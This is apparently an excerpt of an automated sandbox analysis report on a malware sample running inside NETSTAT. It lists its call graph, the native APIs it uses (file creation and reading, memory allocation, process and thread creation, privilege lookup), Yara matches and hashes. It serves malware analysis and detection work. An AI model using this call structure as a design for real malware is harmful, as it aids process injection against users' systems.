                                  0x0133fde2
                                  0x0133fde5
                                  0x0133fdec
                                  0x0133fdfa
                                  0x0133fdff
                                  0x0133fe0a
                                  0x0133fe0f
                                  0x0133fe17
                                  0x0133fe1e
                                  0x0133fe19
                                  0x0133fe19
                                  0x0133fe19
                                  0x0133fe20
                                  0x0133fe21
                                  0x0133fe22
                                  0x0133fe25
                                  0x0133fe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0133FDFA
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0133FE2B
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0133FE01
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: d08ec3da876baa9f52e368045a9c7e03eb6694b46ce6c58f15efa684193b57e0
                                  • Instruction ID: d42c3966f6f310c0788041f205be8a92b920eea350870680d383e100f2f3fead
                                  • Opcode Fuzzy Hash: d08ec3da876baa9f52e368045a9c7e03eb6694b46ce6c58f15efa684193b57e0
                                  • Instruction Fuzzy Hash: DFF0C232640201BBEA211A89DC06F23BB5AEB84B30F140214F628565E1EA62E82086B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:4.9%
                                  Dynamic/Decrypted Code Coverage:2%
                                  Signature Coverage:0%
                                  Total number of Nodes:697
                                  Total number of Limit Nodes:88
                                  execution_graph 32327 437300 32330 43733b 32327->32330 32338 43a020 32327->32338 32329 43741c 32330->32329 32341 429b40 32330->32341 32332 437371 32346 433e50 32332->32346 32334 4373a0 Sleep 32335 43738d 32334->32335 32335->32329 32335->32334 32351 436f30 LdrLoadDll 32335->32351 32352 437130 LdrLoadDll 32335->32352 32339 43a04d 32338->32339 32353 4387c0 32338->32353 32339->32330 32343 429b64 32341->32343 32342 429b6b 32342->32332 32343->32342 32344 429ba0 LdrLoadDll 32343->32344 32345 429bb7 32343->32345 32344->32345 32345->32332 32347 433e5e 32346->32347 32348 433e6a 32346->32348 32347->32348 32360 4342d0 LdrLoadDll 32347->32360 32348->32335 32350 433fbc 32350->32335 32351->32335 32352->32335 32356 4391e0 32353->32356 32355 4387dc NtAllocateVirtualMemory 32355->32339 32357 4391f0 32356->32357 32359 439212 32356->32359 32358 433e50 LdrLoadDll 32357->32358 32358->32359 32359->32355 32360->32350 32362 2c99540 LdrInitializeThunk 32365 43d4cd 32368 439c80 32365->32368 32369 439ca6 32368->32369 32376 428b60 32369->32376 32371 439cb2 32372 439cd6 32371->32372 32384 427e40 32371->32384 32416 438930 32372->32416 32377 428b6d 32376->32377 32419 428ab0 32376->32419 32379 428b74 32377->32379 32431 428a50 32377->32431 32379->32371 32385 427e67 32384->32385 32827 42a010 32385->32827 32387 427e79 32831 429d60 32387->32831 32389 427e96 32390 427e9d 32389->32390 32882 429c90 LdrLoadDll 32389->32882 32413 427fe4 32390->32413 32835 42d170 32390->32835 32393 427f06 32394 43a270 2 API calls 32393->32394 32393->32413 32395 427f1c 32394->32395 32396 43a270 2 API calls 32395->32396 32397 427f2d 32396->32397 32398 43a270 2 API calls 32397->32398 32399 427f3e 32398->32399 32847 42aed0 32399->32847 32401 427f51 32402 433a50 8 API calls 32401->32402 32403 427f62 32402->32403 32404 433a50 8 API calls 32403->32404 32405 427f73 32404->32405 32406 427f93 32405->32406 32859 42ba40 32405->32859 32407 433a50 8 API calls 32406->32407 32411 427fdb 32406->32411 32414 427faa 32407->32414 32865 427c70 32411->32865 32413->32372 32414->32411 32884 42bae0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32414->32884 32417 4391e0 LdrLoadDll 32416->32417 32418 43894f 32416->32418 32417->32418 32420 428ac3 32419->32420 32470 436e50 LdrLoadDll 32419->32470 32450 436d00 32420->32450 32423 428ad6 32423->32377 32424 428acc 32424->32423 32453 439530 32424->32453 32426 428b13 32426->32423 32464 4288d0 32426->32464 32428 428b33 32471 428320 LdrLoadDll 32428->32471 32430 428b45 32430->32377 32432 428a6a 32431->32432 32433 439820 LdrLoadDll 32431->32433 32805 439820 32432->32805 32433->32432 32436 439820 LdrLoadDll 32437 428a91 32436->32437 32438 42cf70 32437->32438 32439 42cf89 32438->32439 32809 429e90 32439->32809 32441 42cf9c 32813 438460 32441->32813 32444 428b85 32444->32371 32446 42cfc2 32447 42cfed 32446->32447 32820 4384e0 32446->32820 32449 438710 2 API calls 32447->32449 32449->32444 32472 438880 32450->32472 32454 439549 32453->32454 32475 433a50 32454->32475 32456 439561 32457 43956a 32456->32457 32514 439370 32456->32514 32457->32426 32459 43957e 32459->32457 32532 438180 32459->32532 32467 4288ea 32464->32467 32783 426e20 32464->32783 32466 4288f1 32466->32428 32467->32466 32796 4270e0 32467->32796 32470->32420 32471->32430 32473 436d15 32472->32473 32474 4391e0 LdrLoadDll 32472->32474 32473->32424 32474->32473 32476 433d85 32475->32476 32477 433a64 32475->32477 32476->32456 32477->32476 32540 437ed0 32477->32540 32480 433b73 32600 4386e0 LdrLoadDll 32480->32600 32481 433b90 32543 4385e0 32481->32543 32484 433bb7 32486 43a0a0 2 API calls 32484->32486 32485 433b7d 32485->32456 32488 433bc3 32486->32488 32487 433d49 32490 438710 2 API calls 32487->32490 32488->32485 32488->32487 32489 433d5f 32488->32489 32494 433c52 32488->32494 32609 433790 LdrLoadDll NtReadFile NtClose 32489->32609 32492 433d50 32490->32492 32492->32456 32493 433d72 32493->32456 32495 433cb9 32494->32495 32497 433c61 32494->32497 32495->32487 32496 433ccc 32495->32496 32602 438560 32496->32602 32499 433c66 32497->32499 32500 433c7a 32497->32500 32601 433650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32499->32601 32503 433c97 32500->32503 32504 433c7f 32500->32504 32503->32492 32558 433410 32503->32558 32546 4336f0 32504->32546 32506 433c70 32506->32456 32509 433d2c 32606 438710 32509->32606 32510 433c8d 32510->32456 32511 433caf 32511->32456 32513 433d38 32513->32456 32516 439381 32514->32516 32515 439393 32515->32459 32516->32515 32517 43a020 2 API calls 32516->32517 32518 4393b4 32517->32518 32628 433060 32518->32628 32520 439400 32520->32459 32521 4393d7 32521->32520 32522 433060 3 API calls 32521->32522 32524 4393f9 32522->32524 32524->32520 32660 434390 32524->32660 32525 43948a 32526 43949a 32525->32526 32754 439180 LdrLoadDll 32525->32754 32670 438ff0 32526->32670 32529 4394c8 32749 438140 32529->32749 32533 4391e0 LdrLoadDll 32532->32533 32534 43819c 32533->32534 32777 2c9967a 32534->32777 32535 4381b7 32537 43a0a0 32535->32537 32780 4388f0 32537->32780 32539 4395d9 32539->32426 32541 4391e0 LdrLoadDll 32540->32541 32542 433b44 32541->32542 32542->32480 32542->32481 32542->32485 32544 4391e0 LdrLoadDll 32543->32544 32545 4385fc NtCreateFile 32544->32545 32545->32484 32547 43370c 32546->32547 32548 438560 LdrLoadDll 32547->32548 32549 43372d 32548->32549 32550 433734 32549->32550 32551 433748 32549->32551 32552 438710 2 API calls 32550->32552 32553 438710 2 API calls 32551->32553 32554 43373d 32552->32554 32555 433751 32553->32555 32554->32510 32610 43a2b0 LdrLoadDll RtlAllocateHeap 32555->32610 32557 43375c 32557->32510 32559 43345b 32558->32559 32560 43348e 32558->32560 32561 438560 LdrLoadDll 32559->32561 32562 4335d9 32560->32562 32566 4334aa 32560->32566 32563 433476 32561->32563 32564 438560 LdrLoadDll 32562->32564 32565 438710 2 API calls 32563->32565 32570 4335f4 32564->32570 32567 43347f 32565->32567 32568 438560 LdrLoadDll 32566->32568 32567->32511 32569 4334c5 32568->32569 32572 4334e1 32569->32572 32573 4334cc 32569->32573 32624 4385a0 LdrLoadDll 32570->32624 32574 4334e6 32572->32574 32575 4334fc 32572->32575 32577 438710 2 API calls 32573->32577 32579 438710 2 API calls 32574->32579 32586 433501 32575->32586 32611 43a270 32575->32611 32576 43362e 32580 438710 2 API calls 32576->32580 32578 4334d5 32577->32578 32578->32511 32582 4334ef 32579->32582 32581 433639 32580->32581 32581->32511 32582->32511 32593 433513 32586->32593 32614 438690 32586->32614 32587 43357e 32589 433585 32587->32589 32590 43359a 32587->32590 32591 438710 2 API calls 32589->32591 32592 438710 2 API calls 32590->32592 32591->32593 32594 4335a3 32592->32594 32593->32511 32595 4335cf 32594->32595 32618 439e70 32594->32618 32595->32511 32597 4335ba 32598 43a0a0 2 API calls 32597->32598 32599 4335c3 32598->32599 32599->32511 32600->32485 32601->32506 32603 433d14 32602->32603 32604 4391e0 LdrLoadDll 32602->32604 32605 4385a0 LdrLoadDll 32603->32605 32604->32603 32605->32509 32607 4391e0 LdrLoadDll 32606->32607 32608 43872c NtClose 32607->32608 32608->32513 32609->32493 32610->32557 32613 43a288 32611->32613 32625 4388b0 32611->32625 32613->32586 32615 4386ac NtReadFile 32614->32615 32616 4391e0 LdrLoadDll 32614->32616 32617 433567 32615->32617 32616->32615 32617->32587 32623 438520 LdrLoadDll 32617->32623 32619 439e94 32618->32619 32620 439e7d 32618->32620 32619->32597 32620->32619 32621 43a270 2 API calls 32620->32621 32622 439eab 32621->32622 32622->32597 32623->32587 32624->32576 32626 4391e0 LdrLoadDll 32625->32626 32627 4388cc RtlAllocateHeap 32626->32627 32627->32613 32629 433071 32628->32629 32630 433079 32628->32630 32629->32521 32659 43334c 32630->32659 32755 43b250 32630->32755 32632 4330cd 32633 43b250 2 API calls 32632->32633 32637 4330d8 32633->32637 32634 433126 32636 43b250 2 API calls 32634->32636 32640 43313a 32636->32640 32637->32634 32638 43b380 3 API calls 32637->32638 32769 43b2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 32637->32769 32638->32637 32639 433197 32641 43b250 2 API calls 32639->32641 32640->32639 32760 43b380 32640->32760 32643 4331ad 32641->32643 32644 4331ea 32643->32644 32646 43b380 3 API calls 32643->32646 32645 43b250 2 API calls 32644->32645 32647 4331f5 32645->32647 32646->32643 32648 43b380 3 API calls 32647->32648 32653 43322f 32647->32653 32648->32647 32651 43b2b0 2 API calls 32652 43332e 32651->32652 32654 43b2b0 2 API calls 32652->32654 32766 43b2b0 32653->32766 32655 433338 32654->32655 32656 43b2b0 2 API calls 32655->32656 32657 433342 32656->32657 32658 43b2b0 2 API calls 32657->32658 32658->32659 32659->32521 32661 4343a1 32660->32661 32662 433a50 8 API calls 32661->32662 32664 4343b7 32662->32664 32663 43440a 32663->32525 32664->32663 32665 4343f2 32664->32665 32666 434405 32664->32666 32667 43a0a0 2 API calls 32665->32667 32668 43a0a0 2 API calls 32666->32668 32669 4343f7 32667->32669 32668->32663 32669->32525 32770 438eb0 32670->32770 32673 438eb0 LdrLoadDll 32674 43900d 32673->32674 32675 438eb0 LdrLoadDll 32674->32675 32676 439016 32675->32676 32677 438eb0 LdrLoadDll 32676->32677 32678 43901f 32677->32678 32679 438eb0 LdrLoadDll 32678->32679 32680 439028 32679->32680 32681 438eb0 LdrLoadDll 32680->32681 32682 439031 32681->32682 32683 438eb0 LdrLoadDll 32682->32683 32684 43903d 32683->32684 32685 438eb0 LdrLoadDll 32684->32685 32686 439046 32685->32686 32687 438eb0 LdrLoadDll 32686->32687 32688 43904f 32687->32688 32689 438eb0 LdrLoadDll 32688->32689 32690 439058 32689->32690 32691 438eb0 LdrLoadDll 32690->32691 32692 439061 32691->32692 32693 438eb0 LdrLoadDll 32692->32693 32694 43906a 32693->32694 32695 438eb0 LdrLoadDll 32694->32695 32696 439076 32695->32696 32697 438eb0 LdrLoadDll 32696->32697 32698 43907f 32697->32698 32699 438eb0 LdrLoadDll 32698->32699 32700 439088 32699->32700 32701 438eb0 LdrLoadDll 32700->32701 32702 439091 32701->32702 32703 438eb0 LdrLoadDll 32702->32703 32704 43909a 32703->32704 32705 438eb0 LdrLoadDll 32704->32705 32706 4390a3 32705->32706 32707 438eb0 LdrLoadDll 32706->32707 32708 4390af 32707->32708 32709 438eb0 LdrLoadDll 32708->32709 32710 4390b8 32709->32710 32711 438eb0 LdrLoadDll 32710->32711 32712 4390c1 32711->32712 32713 438eb0 LdrLoadDll 32712->32713 32714 4390ca 32713->32714 32715 438eb0 LdrLoadDll 32714->32715 32716 4390d3 32715->32716 32717 438eb0 LdrLoadDll 32716->32717 32718 4390dc 32717->32718 32719 438eb0 LdrLoadDll 32718->32719 32720 4390e8 32719->32720 32721 438eb0 LdrLoadDll 32720->32721 32722 4390f1 32721->32722 32723 438eb0 LdrLoadDll 32722->32723 32724 4390fa 32723->32724 32725 438eb0 LdrLoadDll 32724->32725 32726 439103 32725->32726 32727 438eb0 LdrLoadDll 32726->32727 32728 43910c 32727->32728 32729 438eb0 LdrLoadDll 32728->32729 32730 439115 32729->32730 32731 438eb0 LdrLoadDll 32730->32731 32732 439121 32731->32732 32733 438eb0 LdrLoadDll 32732->32733 32734 43912a 32733->32734 32735 438eb0 LdrLoadDll 32734->32735 32736 439133 32735->32736 32737 438eb0 LdrLoadDll 32736->32737 32738 43913c 32737->32738 32739 438eb0 LdrLoadDll 32738->32739 32740 439145 32739->32740 32741 438eb0 LdrLoadDll 32740->32741 32742 43914e 32741->32742 32743 438eb0 LdrLoadDll 32742->32743 32744 43915a 32743->32744 32745 438eb0 LdrLoadDll 32744->32745 32746 439163 32745->32746 32747 438eb0 LdrLoadDll 32746->32747 32748 43916c 32747->32748 32748->32529 32750 4391e0 LdrLoadDll 32749->32750 32751 43815c 32750->32751 32776 2c99860 LdrInitializeThunk 32751->32776 32752 438173 32752->32459 32754->32526 32756 43b260 32755->32756 32757 43b266 32755->32757 32756->32632 32758 43a270 2 API calls 32757->32758 32759 43b28c 32758->32759 32759->32632 32761 43b2f0 32760->32761 32762 43b34d 32761->32762 32763 43a270 2 API calls 32761->32763 32762->32640 32764 43b32a 32763->32764 32765 43a0a0 2 API calls 32764->32765 32765->32762 32767 433324 32766->32767 32768 43a0a0 2 API calls 32766->32768 32767->32651 32768->32767 32769->32637 32771 438ecb 32770->32771 32772 433e50 LdrLoadDll 32771->32772 32773 438eeb 32772->32773 32774 433e50 LdrLoadDll 32773->32774 32775 438f97 32773->32775 32774->32775 32775->32673 32776->32752 32778 2c9968f LdrInitializeThunk 32777->32778 32779 2c99681 32777->32779 32778->32535 32779->32535 32781 43890c RtlFreeHeap 32780->32781 32782 4391e0 LdrLoadDll 32780->32782 32781->32539 32782->32781 32784 426e30 32783->32784 32785 426e2b 32783->32785 32786 43a020 2 API calls 32784->32786 32785->32467 32787 426e55 32786->32787 32788 426eb8 32787->32788 32789 438140 2 API calls 32787->32789 32790 426ebe 32787->32790 32795 43a020 2 API calls 32787->32795 32799 438840 32787->32799 32788->32467 32789->32787 32791 426ee4 32790->32791 32793 438840 2 API calls 32790->32793 32791->32467 32794 426ed5 32793->32794 32794->32467 32795->32787 32797 4270fe 32796->32797 32798 438840 2 API calls 32796->32798 32797->32428 32798->32797 32800 4391e0 LdrLoadDll 32799->32800 32801 43885c 32800->32801 32804 2c996e0 LdrInitializeThunk 32801->32804 32802 438873 32802->32787 32804->32802 32806 439843 32805->32806 32807 429b40 LdrLoadDll 32806->32807 32808 428a7b 32807->32808 32808->32436 32810 429eb3 32809->32810 32812 429f30 32810->32812 32825 437f10 LdrLoadDll 32810->32825 32812->32441 32814 4391e0 LdrLoadDll 32813->32814 32815 42cfab 32814->32815 32815->32444 32816 438a50 32815->32816 32817 438a6f LookupPrivilegeValueW 32816->32817 32818 4391e0 LdrLoadDll 32816->32818 32817->32446 32818->32817 32821 4391e0 LdrLoadDll 32820->32821 32822 4384fc 32821->32822 32826 2c99910 LdrInitializeThunk 32822->32826 32823 43851b 32823->32447 32825->32812 32826->32823 32828 42a037 32827->32828 32829 429e90 LdrLoadDll 32828->32829 32830 42a066 32829->32830 32830->32387 32832 429d84 32831->32832 32885 437f10 LdrLoadDll 32832->32885 32834 429dbe 32834->32389 32836 42d19c 32835->32836 32837 42a010 LdrLoadDll 32836->32837 32838 42d1ae 32837->32838 32886 42d080 32838->32886 32841 42d1e1 32843 42d1f2 32841->32843 32846 438710 2 API calls 32841->32846 32842 42d1c9 32844 42d1d4 32842->32844 32845 438710 2 API calls 32842->32845 32843->32393 32844->32393 32845->32844 32846->32843 32848 42aee6 32847->32848 32849 42aef0 32847->32849 32848->32401 32850 429e90 LdrLoadDll 32849->32850 32851 42af61 32850->32851 32852 429d60 LdrLoadDll 32851->32852 32853 42af75 32852->32853 32854 42af98 32853->32854 32855 429e90 LdrLoadDll 32853->32855 32854->32401 32856 42afb4 32855->32856 32857 433a50 8 API calls 32856->32857 32858 42b009 32857->32858 32858->32401 32860 42ba66 32859->32860 32861 429e90 LdrLoadDll 32860->32861 32862 42ba7a 32861->32862 32906 42b730 32862->32906 32864 427f8c 32883 42b020 LdrLoadDll 32864->32883 32936 42d430 32865->32936 32867 427c83 32878 427e31 32867->32878 32941 4333a0 32867->32941 32869 427ce2 32869->32878 32944 427a20 32869->32944 32872 43b250 2 API calls 32873 427d29 32872->32873 32874 43b380 3 API calls 32873->32874 32879 427d3e 32874->32879 32875 426e20 4 API calls 32875->32879 32878->32413 32879->32875 32879->32878 32881 4270e0 2 API calls 32879->32881 32949 42ac00 32879->32949 32999 42d3d0 32879->32999 33003 42ceb0 21 API calls 32879->33003 32881->32879 32882->32390 32883->32406 32884->32411 32885->32834 32887 42d09a 32886->32887 32895 42d150 32886->32895 32888 429e90 LdrLoadDll 32887->32888 32889 42d0bc 32888->32889 32896 4381c0 32889->32896 32891 42d0fe 32899 438200 32891->32899 32894 438710 2 API calls 32894->32895 32895->32841 32895->32842 32897 4391e0 LdrLoadDll 32896->32897 32898 4381dc 32897->32898 32898->32891 32900 438216 32899->32900 32901 4391e0 LdrLoadDll 32900->32901 32902 43821c 32901->32902 32905 2c99fe0 LdrInitializeThunk 32902->32905 32903 42d144 32903->32894 32905->32903 32907 42b747 32906->32907 32915 42d470 32907->32915 32911 42b7bb 32912 42b7c2 32911->32912 32927 438520 LdrLoadDll 32911->32927 32912->32864 32914 42b7d5 32914->32864 32916 42d481 32915->32916 32928 427120 32916->32928 32918 42b78f 32923 438960 32918->32923 32919 433a50 8 API calls 32921 42d4b9 32919->32921 32921->32918 32921->32919 32922 43a0a0 2 API calls 32921->32922 32935 42d2b0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 32921->32935 32922->32921 32924 4391e0 LdrLoadDll 32923->32924 32925 43897f CreateProcessInternalW 32924->32925 32925->32911 32927->32914 32929 42721f 32928->32929 32930 427135 32928->32930 32929->32921 32930->32929 32931 433a50 8 API calls 32930->32931 32933 4271a2 32931->32933 32932 4271c9 32932->32921 32933->32932 32934 43a0a0 2 API calls 32933->32934 32934->32932 32935->32921 32937 42d44f 32936->32937 32938 433e50 LdrLoadDll 32936->32938 32939 42d456 SetErrorMode 32937->32939 32940 42d45d 32937->32940 32938->32937 32939->32940 32940->32867 33004 42d200 32941->33004 32943 4333c6 32943->32869 32945 43a020 2 API calls 32944->32945 32948 427a45 32944->32948 32945->32948 32946 427c5a 32946->32872 32948->32946 33023 437b00 32948->33023 32950 42ac1f 32949->32950 32951 42ac19 32949->32951 33080 428620 32950->33080 33071 42ccc0 32951->33071 32954 42ac2c 32955 43b380 3 API calls 32954->32955 32998 42aeb8 32954->32998 32956 42ac48 32955->32956 32957 42ac5c 32956->32957 32958 42d3d0 2 API calls 32956->32958 33089 437f90 32957->33089 32958->32957 32961 42ad86 33105 42aba0 LdrLoadDll LdrInitializeThunk 32961->33105 32962 438180 2 API calls 32963 42acda 32962->32963 32963->32961 32968 42ace6 32963->32968 32965 42ada5 32966 42adad 32965->32966 33106 42ab10 LdrLoadDll NtClose LdrInitializeThunk 32965->33106 32969 438710 2 API calls 32966->32969 32967 42ad2f 32972 438710 2 API calls 32967->32972 32968->32967 32971 438290 2 API calls 32968->32971 32968->32998 32973 42adb7 32969->32973 32971->32967 32975 42ad4c 32972->32975 32973->32879 32974 42adcf 32974->32966 32976 42add6 32974->32976 33092 4375b0 32975->33092 32978 42adee 32976->32978 33107 42aa90 LdrLoadDll LdrInitializeThunk 32976->33107 33108 438010 LdrLoadDll 32978->33108 32980 42ad63 32980->32998 33095 427280 32980->33095 32982 42ae02 33109 42a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32982->33109 32985 42ae26 32987 42ae73 32985->32987 33110 438040 LdrLoadDll 32985->33110 33112 4380a0 LdrLoadDll 32987->33112 32990 42ae44 32990->32987 33111 4380d0 LdrLoadDll 32990->33111 32991 42ae81 32992 438710 2 API calls 32991->32992 32993 42ae8b 32992->32993 32994 438710 2 API calls 32993->32994 32996 42ae95 32994->32996 32997 427280 3 API calls 32996->32997 32996->32998 32997->32998 32998->32879 33000 42d3e3 32999->33000 33184 438110 33000->33184 33003->32879 33005 42d21d 33004->33005 33011 438240 33005->33011 33008 42d265 33008->32943 33012 4391e0 LdrLoadDll 33011->33012 33013 43825c 33012->33013 33021 2c999a0 LdrInitializeThunk 33013->33021 33014 42d25e 33014->33008 33016 438290 33014->33016 33017 4382ac 33016->33017 33018 4391e0 LdrLoadDll 33016->33018 33022 2c99780 LdrInitializeThunk 33017->33022 33018->33017 33019 42d28e 33019->32943 33021->33014 33022->33019 33024 43a270 2 API calls 33023->33024 33025 437b17 33024->33025 33044 428160 33025->33044 33027 437b32 33028 437b70 33027->33028 33029 437b59 33027->33029 33032 43a020 2 API calls 33028->33032 33030 43a0a0 2 API calls 33029->33030 33031 437b66 33030->33031 33031->32946 33033 437baa 33032->33033 33034 43a020 2 API calls 33033->33034 33035 437bc3 33034->33035 33041 437e64 33035->33041 33050 43a060 LdrLoadDll 33035->33050 33037 437e49 33038 437e50 33037->33038 33037->33041 33039 43a0a0 2 API calls 33038->33039 33040 437e5a 33039->33040 33040->32946 33042 43a0a0 2 API calls 33041->33042 33043 437eb9 33042->33043 33043->32946 33045 428185 33044->33045 33046 429b40 LdrLoadDll 33045->33046 33047 4281b8 33046->33047 33049 4281dd 33047->33049 33051 42b340 33047->33051 33049->33027 33050->33037 33052 42b36c 33051->33052 33053 438460 LdrLoadDll 33052->33053 33054 42b385 33053->33054 33055 42b38c 33054->33055 33062 4384a0 33054->33062 33055->33049 33059 42b3c7 33060 438710 2 API calls 33059->33060 33061 42b3ea 33060->33061 33061->33049 33063 4384bc 33062->33063 33064 4391e0 LdrLoadDll 33062->33064 33070 2c99710 LdrInitializeThunk 33063->33070 33064->33063 33065 42b3af 33065->33055 33067 438a90 33065->33067 33068 438aaf 33067->33068 33069 4391e0 LdrLoadDll 33067->33069 33068->33059 33069->33068 33070->33065 33113 42bdb0 33071->33113 33073 42ccd7 33074 42ccf0 33073->33074 33126 423d70 33073->33126 33076 43a270 2 API calls 33074->33076 33078 42ccfe 33076->33078 33077 42ccea 33150 437430 33077->33150 33078->32950 33081 42863b 33080->33081 33082 42d080 3 API calls 33081->33082 33088 42875b 33081->33088 33083 42873c 33082->33083 33084 42876a 33083->33084 33085 428751 33083->33085 33086 438710 2 API calls 33083->33086 33084->32954 33183 425ea0 LdrLoadDll 33085->33183 33086->33085 33088->32954 33090 4391e0 LdrLoadDll 33089->33090 33091 42acb0 33089->33091 33090->33091 33091->32961 33091->32962 33091->32998 33093 42d3d0 2 API calls 33092->33093 33094 4375e2 33092->33094 33093->33094 33094->32980 33096 427298 33095->33096 33097 429b40 LdrLoadDll 33096->33097 33098 4272b3 33097->33098 33099 433e50 LdrLoadDll 33098->33099 33100 4272c3 33099->33100 33101 4272fd 33100->33101 33102 4272cc PostThreadMessageW 33100->33102 33101->32879 33102->33101 33103 4272e0 33102->33103 33104 4272ea PostThreadMessageW 33103->33104 33104->33101 33105->32965 33106->32974 33107->32978 33108->32982 33109->32985 33110->32990 33111->32987 33112->32991 33114 42bde3 33113->33114 33155 42a150 33114->33155 33116 42bdf5 33159 42a2c0 33116->33159 33118 42be13 33119 42a2c0 LdrLoadDll 33118->33119 33120 42be29 33119->33120 33121 42d200 3 API calls 33120->33121 33122 42be4d 33121->33122 33123 42be54 33122->33123 33162 43a2b0 LdrLoadDll RtlAllocateHeap 33122->33162 33123->33073 33125 42be64 33125->33073 33127 423d7b 33126->33127 33128 42b340 3 API calls 33127->33128 33130 423e61 33128->33130 33129 423e68 33129->33077 33130->33129 33163 43a2f0 33130->33163 33132 423ec9 33133 429e90 LdrLoadDll 33132->33133 33134 423fd3 33133->33134 33135 429e90 LdrLoadDll 33134->33135 33136 423ff7 33135->33136 33167 42b400 33136->33167 33140 424083 33141 43a020 2 API calls 33140->33141 33142 424110 33141->33142 33143 43a020 2 API calls 33142->33143 33145 42412a 33143->33145 33144 4242a6 33144->33077 33145->33144 33146 429e90 LdrLoadDll 33145->33146 33147 42416a 33146->33147 33148 429d60 LdrLoadDll 33147->33148 33149 42420a 33148->33149 33149->33077 33151 433e50 LdrLoadDll 33150->33151 33153 437451 33150->33153 33151->33153 33152 437477 33152->33074 33153->33152 33154 437464 CreateThread 33153->33154 33154->33074 33156 42a177 33155->33156 33157 429e90 LdrLoadDll 33156->33157 33158 42a1b3 33157->33158 33158->33116 33160 429e90 LdrLoadDll 33159->33160 33161 42a2d9 33160->33161 33161->33118 33162->33125 33164 43a2fd 33163->33164 33165 433e50 LdrLoadDll 33164->33165 33166 43a310 33165->33166 33166->33132 33168 42b425 33167->33168 33176 438310 33168->33176 33171 4383a0 33172 4391e0 LdrLoadDll 33171->33172 33173 4383bc 33172->33173 33182 2c99650 LdrInitializeThunk 33173->33182 33174 4383db 33174->33140 33177 4391e0 LdrLoadDll 33176->33177 33178 43832c 33177->33178 33181 2c996d0 LdrInitializeThunk 33178->33181 33179 42405c 33179->33140 33179->33171 33181->33179 33182->33174 33183->33088 33185 4391e0 LdrLoadDll 33184->33185 33186 43812c 33185->33186 33189 2c99840 LdrInitializeThunk 33186->33189 33187 42d40e 33187->32879 33189->33187

                                  Executed Functions

                                  Function 004385E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 350 4385e0-438631 call 4391e0 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00433BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00433BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0043862D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: fcb1043aaa514eec64f5c4699e0dd10690412c13ace7cb01d42e5637fa4172b6
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: AFF0B2B2204208ABCB08CF89DC85EEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043868A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 353 43868a-43868c 354 4386d7-4386d9 353->354 355 43868f-4386d5 call 4391e0 NtReadFile 353->355 355->354
                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:C,FFFFFFFF,?,r=C,?,00000000), ref: 004386D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:C
                                  • API String ID: 2738559852-278173926
                                  • Opcode ID: 16c69349b1816a208540ef2aec8ec27e67fd62ea77375001735d694e4455079c
                                  • Instruction ID: 4c5f9648aae18d49e43a884f142673fe2543afb45c1523fc8facbe621884117a
                                  • Opcode Fuzzy Hash: 16c69349b1816a208540ef2aec8ec27e67fd62ea77375001735d694e4455079c
                                  • Instruction Fuzzy Hash: 44F0F4B6200108AFCB14DF99DC85EEB77A9EF8C354F118249FE0DA7241CA34E911CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00438690 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 358 438690-4386a6 359 4386ac-4386d9 NtReadFile 358->359 360 4386a7 call 4391e0 358->360 360->359
                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:C,FFFFFFFF,?,r=C,?,00000000), ref: 004386D5
                                  Strings
                                  Memory Dump Source
